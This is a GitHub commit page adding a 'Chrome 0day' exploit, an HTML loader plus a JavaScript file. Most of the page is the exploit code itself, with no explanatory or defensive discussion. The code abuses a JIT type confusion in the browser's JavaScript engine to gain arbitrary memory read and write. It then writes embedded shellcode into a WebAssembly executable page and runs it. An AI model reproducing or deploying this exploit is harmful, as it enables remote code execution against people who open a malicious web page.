https://github.com/r4j0x00/exploits/commit/7ba55e5ab034d05877498e83f144e187d3ddb160

Skip to content
 
Sign up Sign up

  * Why GitHub?
    Features -
      + Mobile -
      + Actions -
      + Codespaces -
      + Packages -
      + Security -
      + Code review -
      + Project management -
      + Integrations -
      + GitHub Sponsors -
      + Customer stories-
  * Team
  * Enterprise
  * Explore
      + Explore GitHub -

    Learn and contribute

      + Topics -
      + Collections -
      + Trending -
      + Learning Lab -
      + Open source guides -

    Connect with others

      + The ReadME Project -
      + Events -
      + Community forum -
      + GitHub Education -
      + GitHub Stars program -
  * Marketplace
  * Pricing
    Plans -
      + Compare plans -
      + Contact Sales -
      + Education -

[                    ] [search-key]

  *  
    #
    In this repository All GitHub |
    Jump to |

  * No suggested jump to results

  *  
    #
    In this repository All GitHub |
    Jump to |
  *  
    #
    In this user All GitHub |
    Jump to |
  *  
    #
    In this repository All GitHub |
    Jump to |

Sign in Sign up Sign up
{{ message }}

r4j0x00 / exploits

  * Notifications
  * Star 1.4k
  * Fork 467

  * Code
  * Issues 0
  * Pull requests 0
  * Actions
  * Projects 0
  * Security
  * Insights

More

  * Code
  * Issues
  * Pull requests
  * Actions
  * Projects
  * Security
  * Insights

Permalink
This commit does not belong to any branch on this repository, and may
belong to a fork outside of the repository.
Browse files

Add chrome 0day

  * Loading branch information

@r4j0x00
r4j0x00 committed Apr 12, 2021
1 parent cbe5ead commit 7ba55e5ab034d05877498e83f144e187d3ddb160
Unified Split
Showing 2 changed files with 99 additions and 0 deletions.

 1. +1 -0  chrome-0day/exploit.html
 2. +98 -0  chrome-0day/exploit.js

1 chrome-0day/exploit.html
[*] Show comments
View file Edit file Delete file

  @@ -0,0 +1 @@
  <script src="exploit.js"></script>

98 chrome-0day/exploit.js
[*] Show comments
View file Edit file Delete file

  @@ -0,0 +1,98 @@
  var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,
  128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,
  0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128
  ,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,
  128,128,0,1,132,128,128,128,0,0,65,42,11])
  var wasm_mod = new WebAssembly.Module(wasm_code);
  var wasm_instance = new WebAssembly.Instance(wasm_mod);
  var f = wasm_instance.exports.main;
  
  var buf = new ArrayBuffer(8);
  var f64_buf = new Float64Array(buf);
  var u64_buf = new Uint32Array(buf);
  let buf2 = new ArrayBuffer(0x150);
  
  function ftoi(val) {
  f64_buf[0] = val;
  return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
  }
  
  function itof(val) {
  u64_buf[0] = Number(val & 0xffffffffn);
  u64_buf[1] = Number(val >> 32n);
  return f64_buf[0];
  }
  
  const _arr = new Uint32Array([2**31]);
  
  function foo(a) {
  var x = 1;
  x = (_arr[0] ^ 0) + 1;
  
  x = Math.abs(x);
  x -= 2147483647;
  x = Math.max(x, 0);
  
  x -= 1;
  if(x==-1) x = 0;
  
  var arr = new Array(x);
  arr.shift();
  var cor = [1.1, 1.2, 1.3];
  
  return [arr, cor];
  }
  
  for(var i=0;i<0x3000;++i)
  foo(true);
  
  var x = foo(false);
  var arr = x[0];
  var cor = x[1];
  
  const idx = 6;
  arr[idx+10] = 0x4242;
  
  function addrof(k) {
  arr[idx+1] = k;
  return ftoi(cor[0]) & 0xffffffffn;
  }
  
  function fakeobj(k) {
  cor[0] = itof(k);
  return arr[idx+1];
  }
  
  var float_array_map = ftoi(cor[3]);
  
  var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
  var fake = fakeobj(addrof(arr2) + 0x20n);
  
  function arbread(addr) {
  if (addr % 2n == 0) {
  addr += 1n;
  }
  arr2[1] = itof((2n << 32n) + addr - 8n);
  return (fake[0]);
  }
  
  function arbwrite(addr, val) {
  if (addr % 2n == 0) {
  addr += 1n;
  }
  arr2[1] = itof((2n << 32n) + addr - 8n);
  fake[0] = itof(BigInt(val));
  }
  
  function copy_shellcode(addr, shellcode) {
  let dataview = new DataView(buf2);
  let buf_addr = addrof(buf2);
  let backing_store_addr = buf_addr + 0x14n;
  arbwrite(backing_store_addr, addr);
  
  for (let i = 0; i < shellcode.length; i++) {
  dataview.setUint32(4*i, shellcode[i], true);
  }
  }
  
  var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
  console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16))
  ;
  var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142
  ,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,
  3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,
  2334151307,21511234,2290125776,1207959552,1735704709,1355809096,
  1142442123,1226850443,1457770497,1103757128,1216885899,827184641,
  3224455369,3384885676,3238084877,4051034168,608961356,3510191368,
  1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,
  21530628,1096303056,1515806296,1497454657,2202556993,1379999980,
  1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,
  2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,
  2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,
  778267745,6649957];
  copy_shellcode(rwx_page_addr, shellcode);
  f();

Toggle all file notes Toggle all file annotations

0 comments on commit 7ba55e5

Please sign in to comment.

  * (c) 2021 GitHub, Inc.
  * Terms
  * Privacy
  * Security
  * Status
  * Docs

 

  * Contact GitHub
  * Pricing
  * API
  * Training
  * Blog
  * About

You can't perform that action at this time.
You signed in with another tab or window. Reload to refresh your
session. You signed out in another tab or window. Reload to refresh
your session.